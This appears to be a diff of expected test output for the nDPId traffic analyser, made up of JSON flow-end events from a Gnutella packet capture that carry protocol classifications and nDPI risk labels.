-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01250{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 